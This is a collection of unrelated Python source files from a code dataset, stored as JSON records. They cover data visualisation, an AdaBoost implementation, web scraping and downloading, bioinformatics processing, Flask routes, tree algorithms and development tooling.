devices have higher success rates when booking a destination\n\n Args:\n df (dataframe): the input dataframe that we are going to plot about\n\n device_dic (dict): {user_id: device_type}, the device type of each user\n\n result_dic (dict): {user_id: country_destination}, the destination of each user\n\n lang_dic (dict): {user_id: language}, the language of each user\n\n\n \"\"\"\n\n id_grouped = df.groupby('user_id')\n\n id_df = pd.DataFrame(id_grouped['secs_elapsed'].agg([np.sum, np.mean, np.std]))\n id_df['country_destination'] = id_df.index.map(lambda x: result_dic[x] if x in result_dic.keys() else '0')\n id_df['language'] = id_df.index.map(lambda x: lang_dic[x] if x in lang_dic.keys() else '0')\n id_df['device'] = id_df.index.map(lambda x: device_dic[x] if x in device_dic.keys() else '0')\n full_lang = {'en': 'English', 'zh': 'Chinese', 'ko': 'Korean', 'fr': 'French', 'es': 'Spanish',\n 'de': 'German', 'ru': 'Russian', 'it': 'Italian', 'ja': 'Japanese', 'pt': 'Portuguese'}\n id_df['full_language'] = id_df.language.apply(lambda x: full_lang[x] if x in full_lang.keys() else '0')\n\n id_df[id_df['full_language'] != '0'].boxplot(column='sum', by='full_language', showfliers=False, patch_artist=True)\n plt.title('Average time that a single user spend during booking')\n plt.ylabel('Time/ms')\n plt.xlabel('Language')\n plt.xticks(rotation=\"45\")\n st.pyplot()\n\n\n # ===========part 2.3 ============\n st.subheader(\"Part 2.3 Do devices play a role in this comparisons?\")\n\n device_df = pd.DataFrame({'NDF': id_df[id_df['country_destination'] == 'NDF'].groupby('device')['sum'].agg(np.size),\n 'DF': id_df[id_df['country_destination'] != 'NDF'].groupby('device')['sum'].agg(np.size)\n })\n\n str1 = 'Unsuccessful booking'\n str2 = 'Successful booking'\n\n device_usernum = dict(id_df.groupby('device')['country_destination'].agg(np.size))\n device_df['total_number'] = device_df.index.map(lambda x: device_usernum[x] if x in device_usernum.keys() else '0')\n\n device_df[str1] = device_df.eval('NDF / total_number * 100')\n device_df[str2] = device_df.eval('DF / total_number * 100')\n device_df = device_df.sort_values(by=\"total_number\", ascending=True)\n\n device_df[[str2, str1]].plot.barh(stacked=True,legend=False,figsize=(12,7))\n plt.ylabel('Device type(sorted)')\n plt.xlabel('Percentage',fontsize=\"xx-large\")\n plt.title('Success Booking Rate of each Device')\n plt.legend(loc='lower left',bbox_to_anchor=(-0.1,-0.1))\n st.pyplot()\n\n\ndef visualization(df):\n # === Start Streamlit Application ===#\n st.title(\"Airbnb Data Analytics\")\n st.image(Image.open('airbnb-recruiting-new-user-bookings/figs'\n '/data_analytics_front_page.jpg'), use_column_width=True)\n st.markdown(\n \"\"\"\n Interested in what are popular destination spots?\\n\\nWhat about who is \n visiting them?\\n\\nAre there any patterns within the data?\\n\\nIf you \n answered yes to any of these questions, please take a look at our data \n analysis of Airbnb's country booking dataset to find out the answers and \n other relevant information.\n \"\"\")\n\n user_date = load_data()\n device_dic, result_dic, lang_dic = load_data_part2()\n\n # ===========part 1===========\n st.header(\"Part 1: Airbnb Travelers 101\")\n st.markdown(\"This section focuses on investigating the lay of the land with \"\n \"Airbnb's country booking dataset i.e. 
exploring what countries are \"\n \"being visited, when is this happening, etc.\")\n\n # ===========part 1.1 countries visited most===========\n st.subheader(\"Part 1.1 What countries are being visited the most?\")\n\n plot_country_most_visited(user_date)\n\n # ===========part 1.2 when travelling takes place===========\n st.subheader(\"Part 1.2 When is the travelling taking place?\")\n options = st.multiselect('Select countries to view their travelling rate',\n ['US', 'Other', 'FR', 'CA', 'GB', 'ES', 'IT', 'DE', 'NL', 'AU', 'PT'], ['US', 'CA'])\n\n c_x = clean_data(user_date, options)\n\n plot_country_time_series(c_x, options)\n\n # ===========part 1.3 who are the travellerss=========== #\n st.subheader(\"Part 1.3 Who are the travellers?\")\n options1 = st.multiselect('Select countries to see their age distribution',\n ['US', 'Other', 'FR', 'CA', 'GB', 'ES', 'IT', 'DE', 'NL', 'AU', 'PT'], ['US', 'CA'])\n\n plot_age(user_date, options1)\n\n # plot_age_sub(user_date, options1)\n\n st.header(\"Part 2: Successful Booking vs No Booking\")\n st.markdown(\"In ideal world for Airbnb, users, who visit their website, would end \"\n \"up making a booking. However, this isn't the case. We seek to \"\n \"investigate what are similarities and differences between users who \"\n \"make a successful booking vs users who do not book.\")\n\n\n #df, device_dic, result_dic, lang_dic = load_data_part2()\n\n # ===========part 2.1===========\n st.subheader(\"Part 2.1 Is there a pattern in the elapsed time of an action?\")\n plot_avg_time_action_type(df, device_dic, result_dic)\n\n # ===========part 2.2 and 2.3 =========== #\n st.subheader(\"Part 2.2 Delving deeper into the elapsed time\")\n\n plot_language_time(df, device_dic, result_dic, lang_dic)\n\n\nif __name__ == \"__main__\":\n visualization()\n","sub_path":"src/visualization_app.py","file_name":"visualization_app.py","file_ext":"py","file_size_in_byte":16196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"207975048","text":"import numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\n\nclass AdaBoost:\n \n def __init__(self, X, Y):\n self.X = X\n self.Y = Y\n self.n = X.shape[0]\n self.p = X.shape[1]\n self.w = np.repeat(1, X.shape[0]) / X.shape[0]\n self.G = []\n self.a = []\n \n def run(self, times):\n for m in range(times):\n # a\n clf = DecisionTreeClassifier(max_depth = 1, random_state = 1)\n clf.fit(self.X, self.Y, sample_weight = self.w)\n self.G.append(clf)\n # b\n yhats = clf.predict(self.X)\n err = 0\n for i in range(n):\n if self.Y[i] != yhats[i]:\n err += self.w[i]\n err = err / sum(self.w) \n # c\n a = np.log((1 - err) / err)\n self.a.append(a)\n # d \n for i in range(len(self.w)):\n factor = 0\n if self.Y[i] != yhats[i]:\n factor = a\n self.w[i] = self.w[i] * np.exp(factor)\n \n def predict(self):\n yhats = []\n for i in range(n):\n output = 0\n for j in range(len(self.a)):\n output += self.a[j] * self.G[j].predict(X[i:i+1, :])\n if output > 0:\n yhats.append(1)\n else:\n yhats.append(-1)\n self.yhats = yhats \n\n\nn, p = 50, 50\n\nX = np.random.rand(n, n)\nY = np.random.choice([1, -1], n)\n\nmjr = AdaBoost(X, Y)\nmjr.run(5)\nmjr.predict()\nprint(np.sum(mjr.yhats == Y) / len(Y))\nclf = DecisionTreeClassifier(max_depth = 1, random_state = 1)\nclf.fit(X, Y)\nyhats = clf.predict(X)\nprint(np.sum(yhats == Y) / len(Y))\n ","sub_path":"python/anaconda/spyder/machine-learning/AdaBoost-Class.py","file_name":"AdaBoost-Class.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450102076","text":"# -*- coding: UTF-8 -*-\nfrom urllib import request\nfrom urllib import error\nfrom urllib import parse\nfrom http import cookiejar\nimport os\nimport time\n\nimport myGlobal\n\n#User-Agent信息 \nuser_agent = r'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36'\n#Headers信息\nhead = {'User-Agnet': user_agent, 'Connection': 'keep-alive'}\n\ndef downloadVideo(startLine):\n file = open(\"videoUrl.txt\")\n\n downloadUrl = ''\n vid = 0\n\n while 1:\n vid = vid + 1\n if vid < startLine:\n continue\n if vid > 1000:\n break\n downloadUrl = file.readline()\n\n if not downloadUrl:\n break\n try:\n # time.sleep(1)\n path = getPath(vid)\n fileName = path + str(vid) + \".mp4\"\n if os.path.exists(path) == False:\n os.makedirs(path)\n if os.path.exists(fileName) == True:\n continue\n\n req = request.Request(url=downloadUrl, headers=head)\n response = request.urlopen(req)\n \n file2 =response.read()\n with open(fileName,'wb') as f:\n print(\"save -> %s \" % fileName)\n print(downloadUrl)\n f.write(file2)\n except error.URLError as e:\n if hasattr(e, 'code'):\n print(\"HTTPError:%d\" % e.code)\n elif hasattr(e, 'reason'):\n print(\"URLError:%s\" % e.reason)\n print(downloadUrl)\n\ndef getPath(id):\n basePath = myGlobal.path\n hundred = id // 100\n value = id % 100\n return basePath + str(hundred) + \"/\"\n\n\nif __name__ == '__main__':\n startLine = myGlobal.startLine\n downloadVideo(startLine)\n","sub_path":"Python3/spider/playerSpider/downloadVideo.py","file_name":"downloadVideo.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"66173861","text":"from typing import Dict\n\nimport dateparser\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom deutschland.config import Config, module_config\n\n\nclass Publications:\n def __init__(self, config: Config = None):\n if config is None:\n self._config = module_config\n else:\n self._config = config\n\n REQUEST_HEADERS = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"de\",\n \"Cache-Control\": \"max-age=0\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"dnt\": \"1\",\n \"Host\": \"www.handelsregisterbekanntmachungen.de\",\n \"Origin\": \"https://www.handelsregisterbekanntmachungen.de\",\n \"Referer\": \"https://www.handelsregisterbekanntmachungen.de/?aktion=suche\",\n \"sec-ch-ua\": '\"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"',\n \"sec-ch-ua-mobile\": \"?0\",\n \"Sec-Fetch-Dest\": \"document\",\n \"Sec-Fetch-Mode\": \"navigate\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Fetch-User\": \"?1\",\n \"sec-gpc\": \"1\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\",\n }\n\n SEARCH_URL = \"https://www.handelsregisterbekanntmachungen.de/?aktion=suche\"\n\n DEFAULT_FORM_DATA = {\n \"suchart\": \"uneingeschr\",\n \"land\": None,\n \"gericht\": None,\n \"gericht_name\": None,\n \"vt\": None,\n \"vm\": None,\n \"vj\": None,\n \"bt\": None,\n \"bm\": None,\n \"bj\": None,\n \"fname\": None,\n \"fsitz\": None,\n \"rubrik\": None,\n \"az\": None,\n \"gegenstand\": 0,\n \"order\": 4,\n \"button\": \"Suche starten\",\n }\n\n def search_with_raw_params(\n self, params: Dict[str, str] = {}, proxies: Dict[str, str] = None\n ):\n \"\"\"\n Searches the Publications of the Handelsregister with a given dict of parameters.\n\n Parameters\n ----------\n params : dict\n The parameters for the search. Detailed description below.\n\n Search Parameters\n -----------------\n suchart : string\n Specifies whether the search should be general or detailed.\n Either 'uneingeschr' or 'detail'.\n\n General searches (e.g. 
find all publications in all counties and all courts)\n can only include publications from the last 4 weeks.\n\n Detailed searches can include past publications as well, but require\n the following parameters:\n 'county_code', 'court_code', and 'court_name' as well as\n either 'company_name', 'head_office_location'\n or 'registration_type' and 'registration_number'\n\n land : str\n The code of the county in which to search for publications.\n\n Valid options are:\n by: Bayern\n be: Berlin\n br: Brandenburg\n hb: Bremen\n hh: Hamburg\n he: Hessen\n mv: Mecklenburg-Vorpommern\n ni: Niedersachsen\n nw: Nordrhein-Westfalen\n rp: Rheinland-Pfalz\n sl: Saarland\n sn: Sachsen\n st: Sachsen-Anhalt\n sh: Schleswig-Holstein\n th: Thüringen\n\n gericht : str\n The code of the court in which to search for publications.\n Court Code + Court Name combinations can be found in 'params.md'.\n The parameters 'gericht' and 'gericht_name' must both be present.\n\n gericht_name : str\n The name of the court in which to search for publications.\n Court Code + Court Name combinations can be found in 'params.md'.\n This parameter must be provided together with the 'gericht'-parameter.\n\n vt: int\n The day of the date after which publications must have been published.\n\n vm: int\n The month of the date after which publications must have been published.\n\n vj: int\n The year of the date after which publications must have been published.\n\n bt: int\n The day of the date before which publications must have been published.\n\n bm: int\n The month of the date before which publications must have been published.\n\n bj: int\n The year of the date before which publications must have been published.\n\n fname: str\n The name of the company. Must be an exact match.\n\n fsitz: str\n The city where the head office of the company is located.\n\n rubrik: str\n The type of the company registration.\n Valid types are:\n \"A\", \"B\", \"G\", \"V\", \"P\", \"AR\"\n\n az: str\n The number of the company registration.\n\n gegenstand: int\n The type of publication to search for.\n\n Valid options are:\n 0 : All types of publications\n 1 : New registrations\n 2 : Registration changes\n 3 : Registrations deleted by the court\n 4 : Deletion announcements\n 5 : Deletions\n 6 : Granted Permissions\n 7 : Other procedures\n\n order: int\n How to order the publication results.\n\n Valid options are:\n 1 : Registration Number\n 2 : Company name\n 3 : Order by creation date of publication\n 4 : Order by publication date\n \"\"\"\n\n # parameter has higher priority than member\n if proxies is None:\n if self._config is not None and self._config.proxy_config is not None:\n proxies = self._config.proxy_config\n\n search_params = {**self.DEFAULT_FORM_DATA, **params}\n\n response = requests.post(\n self.SEARCH_URL,\n data=search_params,\n headers=self.REQUEST_HEADERS,\n proxies=proxies,\n )\n if response.status_code != 200:\n return None\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n return self.__find_entries(soup)\n\n def __find_entries(self, soup):\n content = soup.find(\"div\", id=\"inhalt\")\n lis = content.find_all(\"li\")\n\n results = []\n\n for li in lis:\n a = li.find(\"a\")\n [pub_id, county_code] = self.__extract_pub_id_and_county_code(a)\n\n ul = a.find(\"ul\")\n [info, _, published_info] = ul.contents\n\n company_info = self.__extract_company_info(info)\n published_at = self.__extract_published_at(published_info)\n\n data = {\n **{\n \"publication_id\": pub_id,\n \"county_code\": county_code,\n \"published_at\": 
published_at,\n },\n **company_info,\n }\n\n results.append(data)\n\n return results\n\n def __extract_pub_id_and_county_code(self, link):\n [pub_id, county] = (\n link[\"href\"]\n .replace(\"javascript:NeuFenster('rb_id=\", \"\")\n .replace(\"')\", \"\")\n .split(\"&\")\n )\n county_code = county.replace(\"land_abk=\", \"\")\n\n return [pub_id, county_code]\n\n def __extract_company_info(self, text):\n branch_name = None\n\n fields = text.split(\",\")\n if len(fields) == 3:\n [company_name, court, reg_info] = fields\n elif len(fields) == 4:\n [company_name, branch_name, court, reg_info] = fields\n else:\n raise Exception(f\"Could not parse publication info: '{text}'.\")\n\n [reg_type, reg_num] = reg_info.strip().split(\" \")\n\n return {\n \"company_name\": company_name.strip(),\n \"court\": court.strip(),\n \"branch_name\": branch_name.strip() if branch_name else None,\n \"registration_type\": reg_type.strip(),\n \"registration_number\": reg_num.strip(),\n }\n\n def __extract_published_at(self, info):\n published_at_raw = info.replace(\"Bekannt gemacht am: \", \"\")\n return dateparser.parse(published_at_raw, date_formats=[\"%d.%m.%Y\"])\n","sub_path":"src/deutschland/handelsregister/publications.py","file_name":"publications.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
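# Editor's note: a hedged usage sketch for the Publications class above; the
# parameter values are illustrative picks from the documented options, and the
# import path is inferred from the record's sub_path.
from deutschland.handelsregister.publications import Publications

results = Publications().search_with_raw_params(params={
    "suchart": "uneingeschr",  # general search (last 4 weeks only, per docstring)
    "land": "be",              # county code for Berlin
    "gegenstand": 1,           # publication type: new registrations
})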
+{"seq_id":"53889001","text":"#! /usr/bin/env python3\n\n\"\"\"Collect all read length distribution .csv.gz files for all replicates\ninto a large table (unique counts only). If the files are not already available,\nthen they are created.\n\nNote* The isoform strategy option will be removed.\n\n Does not consider the filtered Ribo-seq BAM files with\n periodic fragment lengths (i.e. uses all fragments,\n they can easily be filtered afterwards); however, for RNA-seq, if\n mapping was done on trimmed reads, additional arguments must be\n given to find the right files.\n\nFunctions:\n add_data\n\"\"\"\n\nimport os\nimport argparse\nimport logging\nimport yaml\nimport csv\nimport re\n\nimport pandas as pd\n\nimport pbio.misc.logging_utils as logging_utils\nimport pbio.misc.parallel as parallel\nimport pbio.misc.pandas_utils as pandas_utils\nimport pbio.misc.utils as utils\nimport pbio.misc.shell_utils as shell_utils\n\nimport pbio.ribo.ribo_utils as ribo_utils\nimport pbio.ribo.ribo_filenames as filenames\n\nimport btea.utils.cl_utils as clu\n\nfrom rpbp.defaults import metagene_options\n\nlogger = logging.getLogger(__name__)\n\ndata_get_length_distribution = {\n 'rna': filenames.get_rnaseq_read_length_distribution,\n 'ribo': filenames.get_riboseq_read_length_distribution,\n}\n\ndata_get_bam = {\n 'rna': filenames.get_rnaseq_bam,\n 'ribo': filenames.get_riboseq_bam,\n}\n\n\ndef add_data(sample_name, get_length_distribution, data, note, args):\n\n read_length_distribution_file = get_length_distribution(data,\n sample_name,\n note=note,\n isoform_strategy=args.isoform_strategy)\n\n read_length_distribution = pd.read_csv(read_length_distribution_file)\n\n ret = pd.pivot_table(read_length_distribution,\n values='count',\n columns='length',\n index='basename')\n\n return ret\n\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('config', help=\"The yaml configuration file.\")\n\n parser.add_argument('seq', choices=['rna', 'ribo'])\n\n parser.add_argument('out', help='''The output file complete path without extension. \n If relevant, two files are created, one for all reads, and another for unique mappers.''')\n\n parser.add_argument('--overwrite', help='''Overwrites output file. This will NOT \n overwrite the read length distribution files.''', action='store_true')\n\n parser.add_argument('--ribo-config', help=\"\"\"Optional argument: the Ribo config file\n when seq is rna and rna reads have been trimmed to max ribo fragment lengths.\n If reads are trimmed then this needs to be given, otherwise the program will not find \n the alignment files. 
In addition, the rna config file must include 'matching_samples'.\"\"\",\n type=str)\n\n clu.add_isoform_strategy(parser)\n logging_utils.add_logging_options(parser)\n args = parser.parse_args()\n logging_utils.update_logging(args)\n logging_str = logging_utils.get_logging_options_string(args)\n\n config = yaml.load(open(args.config), Loader=yaml.FullLoader)\n note = config.get('note', None)\n\n if args.ribo_config:\n ribo_config = yaml.load(open(args.ribo_config), Loader=yaml.FullLoader)\n is_unique_ribo = not ('keep_riboseq_multimappers' in ribo_config)\n\n keep_key = 'keep_' + str(args.seq) + 'seq_multimappers'\n is_unique = not (keep_key in config)\n\n data_key = str(args.seq) + 'seq_data'\n rep_key = str(args.seq) + 'seq_samples'\n replicates = config[rep_key].keys()\n\n get_length_distribution = data_get_length_distribution[args.seq]\n get_bam = data_get_bam[args.seq]\n\n sample_name_map = ribo_utils.get_sample_name_map(config)\n\n # first check if the files exist, if not generate the read length distributions\n for replicate in replicates:\n\n read_length_distribution = get_length_distribution(config[data_key],\n replicate,\n note=note,\n isoform_strategy=args.isoform_strategy)\n\n ret = utils.check_files_exist([read_length_distribution], raise_on_error=False)\n if ret:\n continue\n\n msg = 'Creating {}'.format(read_length_distribution)\n logger.info(msg)\n\n if args.seq == 'rna' and args.ribo_config:\n config_keys = ['matching_samples']\n utils.check_keys_exist(config, config_keys)\n matching_ribo_sample = config['matching_samples'][replicate]\n\n # get the lengths, we don't need the offsets\n lengths, _ = ribo_utils.get_periodic_lengths_and_offsets(ribo_config,\n matching_ribo_sample,\n is_unique=is_unique_ribo,\n default_params=metagene_options,\n isoform_strategy=args.isoform_strategy)\n\n if len(lengths) == 0:\n msg = \"No periodic read lengths and offsets were found!\"\n logger.error(msg)\n\n lengths = str(max([int(l) for l in lengths]))\n\n else:\n lengths = None\n\n # all aligned reads\n genome_bam = get_bam(config[data_key],\n replicate,\n is_unique=False,\n length=lengths,\n isoform_strategy=args.isoform_strategy,\n note=note)\n\n if is_unique:\n # uniquely aligned reads\n unique_bam = get_bam(config[data_key],\n replicate,\n is_unique=is_unique,\n length=lengths,\n isoform_strategy=args.isoform_strategy,\n note=note)\n\n in_files = [genome_bam, unique_bam]\n cmd = \"get-read-length-distribution {} {} --out {} {}\".format(\n genome_bam,\n unique_bam,\n read_length_distribution,\n logging_str\n )\n else:\n in_files = [genome_bam]\n cmd = \"get-read-length-distribution {} --out {} {}\".format(\n genome_bam,\n read_length_distribution,\n logging_str\n )\n\n out_files = [read_length_distribution]\n shell_utils.call_if_not_exists(cmd,\n out_files,\n in_files=in_files,\n call=True)\n\n msg = 'Parsing read length distribution files'\n logger.info(msg)\n\n all_length_distributions = parallel.apply_iter_simple(\n replicates,\n add_data,\n get_length_distribution,\n config[data_key],\n note,\n args\n )\n\n all_length_distributions_df = pd.concat(all_length_distributions).fillna(0)\n all_length_distributions_df['name'] = all_length_distributions_df.index\n\n # adjust the names\n if args.isoform_strategy is not None:\n repl = '.{}'.format(args.isoform_strategy)\n all_length_distributions_df['name'] = all_length_distributions_df['name'].str.replace(repl, '')\n if args.seq == 'rna' and args.ribo_config:\n repl = re.compile('.length-\\d{2}')\n all_length_distributions_df['name'] = 
all_length_distributions_df['name'].str.replace(repl, '')\n if note is not None:\n repl = '.{}'.format(note)\n all_length_distributions_df['name'] = all_length_distributions_df['name'].str.replace(repl, '')\n\n # split into all and unique\n m_unique = False\n out_files = [args.out + '.csv.gz']\n out_df = []\n if is_unique:\n m_unique = all_length_distributions_df['name'].str.contains('unique')\n unique_read_length_distribution_df = all_length_distributions_df[m_unique].copy()\n unique_read_length_distribution_df['name'] = unique_read_length_distribution_df['name'].str.replace('-unique',\n '')\n unique_read_length_distribution_df['name'] = unique_read_length_distribution_df['name'].apply(\n lambda x: sample_name_map[x])\n unique_read_length_distribution_df.set_index('name', inplace=True)\n unique_read_length_distribution_df.index.name = 'condition'\n out_files.append(args.out + '-unique.csv.gz')\n out_df.append(unique_read_length_distribution_df)\n\n all_length_distributions_df = all_length_distributions_df[~m_unique]\n all_length_distributions_df['name'] = all_length_distributions_df['name'].apply(lambda x: sample_name_map[x])\n all_length_distributions_df.set_index('name', inplace=True)\n all_length_distributions_df.index.name = 'condition'\n out_df.append(all_length_distributions_df)\n out_df.reverse()\n\n msg = \"Writing output to: {}\".format(','.join(out_files))\n logger.info(msg)\n\n for file, df in zip(out_files, out_df):\n if os.path.exists(file) and not args.overwrite:\n msg = \"Output file {} already exists. Skipping.\".format(file)\n logger.warning(msg)\n else:\n pandas_utils.write_df(df, file, create_path=True,\n index=True, sep=',', header=True,\n do_not_compress=False, quoting=csv.QUOTE_NONE)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pproc/pgrms/get_all_read_length_distributions.py","file_name":"get_all_read_length_distributions.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"124807441","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport math #add modul math\r\nimport numpy #add modul numpy\r\nimport matplotlib.pyplot as mpp #add modul matplotlib and rename it to mpp\r\n\r\n\r\nif __name__=='__main__': #условие\r\n arguments = numpy.r_[0:200:0.1]#arguments - множество чисел от 0 до 200 с шагом0.1\r\n mpp.plot( #обращение к модулю\r\n arguments, #???\r\n [math.sin(a) * math.sin(a/20.0) for a in arguments] #для а из arguments\r\n ) #скобочка)\r\n mpp.show() #вывод графика\r\n","sub_path":"my1stpr.py","file_name":"my1stpr.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"400483873","text":"from app.controllers.product_controller import (\n create_product,\n delete_product_by_id,\n get_product_by_id,\n get_products,\n get_image_product,\n update_product_by_id,\n upload_product_image_by_product_id\n)\nfrom flask import Blueprint\n\nbp = Blueprint('products_bp', __name__, url_prefix='/products')\n\nbp.post('')(create_product)\nbp.post('/')(upload_product_image_by_product_id)\nbp.get('')(get_products)\nbp.get('/')(get_product_by_id)\nbp.get('//')(get_image_product)\nbp.patch('/')(update_product_by_id)\nbp.delete('/')(delete_product_by_id)\n","sub_path":"app/routes/products_routes.py","file_name":"products_routes.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"645299520","text":"\n\nclass Node:\n def __init__(self, data):\n self.key = data\n self.left = self.right= None\n\n\ndef areIdentical(root1, root2):\n if root1 is None and root2 is None:\n return True\n if root1 is None or root2 is None:\n return False\n\n return (root1.key==root2.key and areIdentical(root1.left, root2.left) and areIdentical(root1.right,root2.right))\n\n\ndef isSubtree(T, S):\n if S is None:\n return True\n\n if T is None:\n return False\n\n if areIdentical(T, S):\n return True\n\n return isSubtree(T.left, S) or isSubtree(T.right, S)\n\n\nif __name__ == \"__main__\":\n T = Node(26)\n T.right = Node(3)\n T.right.right = Node(3)\n T.left = Node(10)\n T.left.left = Node(4)\n T.left.left.right = Node(30)\n T.left.right = Node(6)\n\n S = Node(10)\n S.right = Node(6)\n S.left = Node(4)\n S.left.right = Node(30)\n S.left.right.left = Node(80)\n\n\n if isSubtree(T, S):\n print(\"Tree 2 is subtree of Tree 1\")\n else :\n print(\"Tree 2 is not a subtree of Tree 1\")","sub_path":"Tree/9.check_BST_is_subtree_of_anotherBST.py","file_name":"9.check_BST_is_subtree_of_anotherBST.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"135647309","text":"import imp\nimport os\nimport shlex\nimport subprocess\nimport sys\nimport unittest\nfrom io import StringIO\n\nimport coverage\nfrom isort import SortImports\nfrom pep8 import StyleGuide\nfrom pyflakes.api import checkPath\nfrom pyflakes.reporter import Reporter\n\nimport subcomm\n\nHERE = os.path.dirname(os.path.abspath(__file__))\n\nparser = subcomm.SubcommParser(description='Helper for Subcomm development.')\n\n\n#########\n# HELPERS\n#########\n\nclass CommandFailed(Exception):\n pass\n\n\ndef run(command, *args, **kwargs):\n if subprocess.run(shlex.split(command), *args, **kwargs).returncode != 0:\n raise CommandFailed(command)\n\n\ndef output(command, *args, **kwargs):\n return subprocess.check_output(shlex.split(command), *args, **kwargs)\\\n .decode('utf-8')\n\n\nSTYLEGUIDE = StyleGuide()\n\n\ndef check_pep8(path):\n pep8_stdout = StringIO()\n default_stdout = sys.stdout\n sys.stdout = pep8_stdout\n pep8_errors = STYLEGUIDE.input_file(path)\n sys.stdout = default_stdout\n\n if pep8_errors:\n return pep8_stdout.getvalue().strip().split('\\n')\n return []\n\n\ndef check_pyflakes(path):\n stdout = StringIO()\n reporter = Reporter(stdout, stdout)\n errors = checkPath(path, reporter)\n\n if errors > 0:\n return stdout.getvalue().strip().split('\\n')\n return []\n\n\ndef check(path):\n errors = []\n errors.extend(check_pep8(path))\n errors.extend(check_pyflakes(path))\n return errors\n\n\ndef pristine_repository():\n return not bool([\n line\n for line in output('git clean -dfx --dry-run').strip().split('\\n')\n if line and '__pycache__' not in line\n ])\n\n\ndef sort_requirements():\n with open(os.path.join(HERE, 'min-requirements.txt'), 'r') as fp:\n requirements = fp.read()\n requirements = '\\n'.join(sorted(requirements.strip().split('\\n'),\n key=str.lower)) + '\\n'\n with open(os.path.join(HERE, 'min-requirements.txt'), 'w') as fp:\n fp.write(requirements)\n\n\ndef sort_code(path):\n SortImports(path, multi_line_output=2, not_skip=['__init__.py'])\n\n\n##########\n# HANDLERS\n##########\n\n@parser.command(help='Check code quality.')\ndef quality():\n sort_requirements()\n\n errors = []\n for root, dirs, files in os.walk(HERE):\n for file in files:\n if file.endswith('.py'):\n path = os.path.join(root, file)\n sort_code(path)\n errors.extend(check(path))\n\n if errors:\n print('\\n'.join(errors))\n return 1\n\n print('Code looks good. 
Congratulations :)')\n return 0\n\n\n@parser.command(help='Run automated test suite.')\ndef test():\n cov = coverage.Coverage(branch=True, source=['subcomm'])\n cov.start()\n\n imp.reload(subcomm)\n\n test_loader = unittest.defaultTestLoader\n test_suite = test_loader.discover(start_dir=os.path.join(HERE))\n runner = unittest.TextTestRunner(verbosity=2)\n success = runner.run(test_suite).wasSuccessful()\n\n cov.stop()\n\n if not success:\n return 1\n\n cover_percent = cov.html_report(directory='html_cov')\n print('Test coverage: {percent:.2f}%'.format(percent=cover_percent))\n return 0 if cover_percent == 100 else 1\n\n\n@parser.command(help='Packages Subcomm for distribution in PyPI.')\ndef package():\n if not pristine_repository():\n print('Repository is not pristine.')\n return 1\n\n if quality() != 0:\n print(\"Repository's code is not passing quality test.\")\n return 1\n\n run('python setup.py sdist')\n run('python setup.py bdist_wheel')\n return 0\n\n\n########################\n# DEVELOPMENT ENTRYPOINT\n########################\n\nif __name__ == '__main__':\n sys.exit(parser.run())\n","sub_path":"dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"427513813","text":"from __future__ import with_statement\r\nimport sys\r\nimport time\r\ndef test_encode_decode():\r\n shalom = '\\u05dd\\u05d5\\u05dc\\u05e9'\r\n text = shalom*1000000\r\n start = time.time()\r\n text_utf8 = text.encode('utf-8')\r\n text_utf16 = text.encode('utf-16')\r\n assert text_utf8.decode() == text\r\n assert text_utf16.decode('utf-16') == text\r\n end = time.time()-start\r\n print (end)\r\n return end\r\n\r\ntest = test_encode_decode\r\nif __name__== '__main__':\r\n times = [test() for i in range(10)]\r\n times.remove(max(times))\r\n times.remove(min(times))\r\n print('Average:', sum(times)/len(times))\r\n","sub_path":"note.md/4_素材文件和源代码/01-3.py","file_name":"01-3.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
